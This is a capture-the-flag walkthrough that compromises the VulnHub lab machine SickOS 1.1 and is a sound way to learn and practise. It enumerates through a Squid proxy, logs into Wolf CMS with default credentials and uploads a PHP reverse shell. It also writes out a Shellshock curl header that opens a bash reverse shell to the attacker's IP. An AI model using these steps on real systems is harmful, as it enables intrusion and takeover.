SICKOS 1.1
- Layout for this exercise:
data:image/s3,"s3://crabby-images/0072a/0072a0c13286d30573fe1843a6dbac94ed4aedce" alt=""
1 - INTRODUCTION
- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1
- SickOS 1.1 can be downloaded from here:
https://www.vulnhub.com/entry/sickos-11,132/
data:image/s3,"s3://crabby-images/86c2e/86c2e706037a17334161949a4b3c530d10240a51" alt=""
- Once downloaded and extracted with WMware:
data:image/s3,"s3://crabby-images/e4760/e4760c4575b13e066d4a3aaf52130b09ec453320" alt=""
2 - ENUMERATION
- Using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:
data:image/s3,"s3://crabby-images/eab3d/eab3de5ad1e1a93bec6fdb25804298648653af1b" alt=""
data:image/s3,"s3://crabby-images/8a4a6/8a4a6864cb841af43fb24c8838d76c396514c7df" alt=""
- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):
data:image/s3,"s3://crabby-images/ca58e/ca58edb93d6a378254049c86268167a699d971d6" alt=""
- Configuring the Firefox Connection Settings for the discovered HTTP proxy (192.168.1.15:3128)
data:image/s3,"s3://crabby-images/87b80/87b80fcdaefe9767e4522dcd342ca3ff3c487def" alt=""
- Connecting with the browser:
data:image/s3,"s3://crabby-images/6d0e5/6d0e58209ab71b9a1e212002ec9a7a0be7e05612" alt=""
- Viewing the source there is nothing interesting:
data:image/s3,"s3://crabby-images/d466b/d466baf29d69a1880756373425adc468098e8bc9" alt=""
- Let's explore the website structure with dirb:
data:image/s3,"s3://crabby-images/d9436/d943648015038dd641b3888c6768f5c0e26f91d2" alt=""
- Looking at the robots.txt file:
data:image/s3,"s3://crabby-images/2bde1/2bde144cbde3c2f7bc9f5594e3f38b3a9d265a01" alt=""
- Exploring the folder /wolfcms:
data:image/s3,"s3://crabby-images/a6abe/a6abe1ff3b386d20babd4dcc8a28c788c63ed7f3" alt=""
- Using dirb against wolfcms:
data:image/s3,"s3://crabby-images/16412/16412fbdce7d59cd0ee6727db1be5639a7a764af" alt=""
- Looking inside the public folder:
data:image/s3,"s3://crabby-images/0d31c/0d31cb534b45db23521213df25967f49bd8baa2c" alt=""
- Using nikto to discover potential vulnerabilities:
data:image/s3,"s3://crabby-images/c5a84/c5a84a60db9b1233f004c7b1f0ec99391fb742de" alt=""
- The most remarkable result is that /cgi-bin/status is vulnerable to shellshock vulnerability:
data:image/s3,"s3://crabby-images/7abb1/7abb1375afd3c1a4b1436b3a3b268b5fa21d0476" alt=""
3 - EXPLOITATION
- Let's try two ways to exploit the vulnerable machine.
3.1 - Uploading a webshell
- Googling for Wolf CMS vulnerabilities:
data:image/s3,"s3://crabby-images/7852b/7852b2a888d40d873561301f0d00bd6e107c052c" alt=""
data:image/s3,"s3://crabby-images/947fa/947fa1ec8ab7ea564f5c2cd9ef446bdd285876c6" alt=""
- Going back to /wolfcms we learn that there is an Administrator:
data:image/s3,"s3://crabby-images/375e4/375e47f9a53886ab59d328da9a769ca4f791431b" alt=""
- Reading from the previous description of the vulnerability:
data:image/s3,"s3://crabby-images/fe9d1/fe9d1c5d737b97c797752c25e6f5b9a608774535" alt=""
- Let's explore the admin option:
data:image/s3,"s3://crabby-images/c2c4a/c2c4aae3487842a3ba818cd175ca0c8486b71848" alt=""
- Trying admin:admin the authentication works:
data:image/s3,"s3://crabby-images/59928/5992812cb204c29f438905ce92b58bf8b20a39ca" alt=""
data:image/s3,"s3://crabby-images/01448/01448eff0b1e0f15c345353b9ced51f7d1ae011a" alt=""
- Going to the Files tab there is an Upload File function:
data:image/s3,"s3://crabby-images/d43f7/d43f7c03611f55af662da029e3aece32ad27ca42" alt=""
data:image/s3,"s3://crabby-images/48f74/48f740baa3f3167c0c49666f485a40f8197aa0aa" alt=""
- Up to this point, why not to upload a webshell?
- Kali Linux has got some webshells available:
data:image/s3,"s3://crabby-images/7d3db/7d3db5b7ac3e7cd59b1b912af75c2cd5ad801ff3" alt=""
- For instance, let's explore php-reverse-shell.php.
- Opening the file we see that there are two parameters that must be changed or adapted to our neeeds (IP and port to connect):
data:image/s3,"s3://crabby-images/44fa8/44fa894f7c8ca54bf47c25fc42697d30e7a84bb7" alt=""
data:image/s3,"s3://crabby-images/87f21/87f21d61ee5667103c767fe90f405f0ead771866" alt=""
- Copying the webshell to a working folder so that we can manipulate it without losing the original version:
data:image/s3,"s3://crabby-images/b37d6/b37d6fa0617ced691c9755acdef3468c14ff500d" alt=""
data:image/s3,"s3://crabby-images/190aa/190aa851194a85fbf846c0e47654b46cac1dff93" alt=""
- Opening the webshell and modifying IP and port:
data:image/s3,"s3://crabby-images/2f9ad/2f9ade9be0a7494ae859a52cbcc5860765ca15ff" alt=""
data:image/s3,"s3://crabby-images/20761/20761d472afe5a76a54cafe6f26d5d0081a3e50a" alt=""
- Now it is ready to be uploaded to the vulnerable machine:
data:image/s3,"s3://crabby-images/0a757/0a757ab5dfee6452b5a73129b599934a9b7c1253" alt=""
data:image/s3,"s3://crabby-images/b6b94/b6b9402cbc329d22cb8d9e84707628ecc607b0ac" alt=""
- We find php-reverse-shell.php at the /public folder:
data:image/s3,"s3://crabby-images/80a78/80a786396055310bbaea9234575fe8586c0af2e1" alt=""
- Before running it, let's establish a netcat listening session on port 3333:
data:image/s3,"s3://crabby-images/24f23/24f237b87ba5927ca650c52328e6c8b924c0e38c" alt=""
- Running the webshell:
data:image/s3,"s3://crabby-images/87298/8729830082461faf771d7bb204516e530888f72d" alt=""
- The attack is successful, and a limited shell is achieved at the attacker's side:
data:image/s3,"s3://crabby-images/8dafc/8dafca3f104ee1946642bb026777d1db29d0def9" alt=""
3.2 - Shellshock
- Now, let's try to exploit the site taking advantage of the shellshock vulnerability
https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/
- We can check that the cgi script uses bash as interpreter because the path gives us uptime/uname result inside a Json string:
data:image/s3,"s3://crabby-images/b6786/b678694ffbc4f69f98ba4e5b2258732a1ea5764a" alt=""
- Setting up a netcat listening session on port 4444:
data:image/s3,"s3://crabby-images/3983e/3983e005606681ea6a2f0d8f487254d32fe3cd9f" alt=""
- Let's craft a command curl to achieve a reverse shell:
https://curl.haxx.se/docs/manpage.html
https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
- The parameters used in this case:
- - x (proxy) = 192.168.1.15:3128
- -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1
- target = http://192.168.1.15/cgi-bin/status
data:image/s3,"s3://crabby-images/6a1ed/6a1ede08a4960cd15e2bae26bca84a509f4b5b66" alt=""
- A limited shell is achieved at the attacker's side:
data:image/s3,"s3://crabby-images/a6239/a62398e15a0fee83c6212f5b3437a8ed8224defa" alt=""
4 - PRIVILEGE ESCALATION
- Listing the folder /var/www:
data:image/s3,"s3://crabby-images/09c99/09c9963fb517f68c8b0cd990c38e8dc0f45e527b" alt=""
- Listing wolfcms:
data:image/s3,"s3://crabby-images/7632a/7632a4777f4295a4d4415b749a04296146e30a28" alt=""
- Opening config.php we find interesting credentials for the user root:
data:image/s3,"s3://crabby-images/2047d/2047d114efe8eae46ca0b69c6ee1f533d77d799a" alt=""
- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow to use the sudo command:
data:image/s3,"s3://crabby-images/de3fe/de3fe5548dbc88c624960975bc095b48c234d183" alt=""
- Importing a tty terminal so that we can run a /bin/bash shell:
data:image/s3,"s3://crabby-images/78f38/78f384dc1d48a83de3e9a1e6e396dff2cc665600" alt=""
data:image/s3,"s3://crabby-images/ae564/ae5641e863ec9d4fd3b0de98c02b655b91e46800" alt=""
- Trying again, su works but the authentication fails:
data:image/s3,"s3://crabby-images/b02a3/b02a3175d697024488d1f2631b254bfcfa906cf8" alt=""
- Remembering the current user:
data:image/s3,"s3://crabby-images/8ea1b/8ea1b0f512b1360c2d8ac568e1c2be7b873a421c" alt=""
- Let's move to another user, for instance sickos:
data:image/s3,"s3://crabby-images/d8bb7/d8bb7eae19c692e5f4827857f92a182c3310d4e7" alt=""
- Now the authentication is correct:
data:image/s3,"s3://crabby-images/f45c3/f45c3ae4c7dd348932f24b3a20c683019af7ff08" alt=""
- Finally a root shell is achieved:
data:image/s3,"s3://crabby-images/dcba2/dcba28a78b124a6912a2ab3095b5d9f6887cdcd9" alt=""
- Also, we could reach to same point by SSH-ing with the sickos user account:
data:image/s3,"s3://crabby-images/197eb/197eb9bf3fb2f2931fa1235c6de84ad2cb84d384" alt=""
data:image/s3,"s3://crabby-images/0e10b/0e10b55f17dbdeeedef4b08e9c9c8a0702bf65fd" alt=""
- Surprisingly, sickos is a complete sudoer:
data:image/s3,"s3://crabby-images/0c56b/0c56bcb306c6bd641e37f8de16dfeec05185822c" alt=""
data:image/s3,"s3://crabby-images/aa6a9/aa6a997a6e14f8d02eb41efbcc18121b6aaea2d3" alt=""
- Also:
data:image/s3,"s3://crabby-images/7e5b7/7e5b7c069dc7a3a746dda600c4bb36a0c76a8c5c" alt=""
5 - CAPTURING THE FLAG
- Reading the flag:
data:image/s3,"s3://crabby-images/fcfdb/fcfdb9ce0a9ad7996b7266fb3c1828f5697632fe" alt=""
- By the way, the flag's name is an MD5 encryption string:
data:image/s3,"s3://crabby-images/c76ff/c76ff01f1cd2e5679710982982797a6e6a851d1a" alt=""
- Decrypting it results to be bleh!!
data:image/s3,"s3://crabby-images/d2429/d2429db53ee53d1564ce97dcffbfb9652b6387b4" alt=""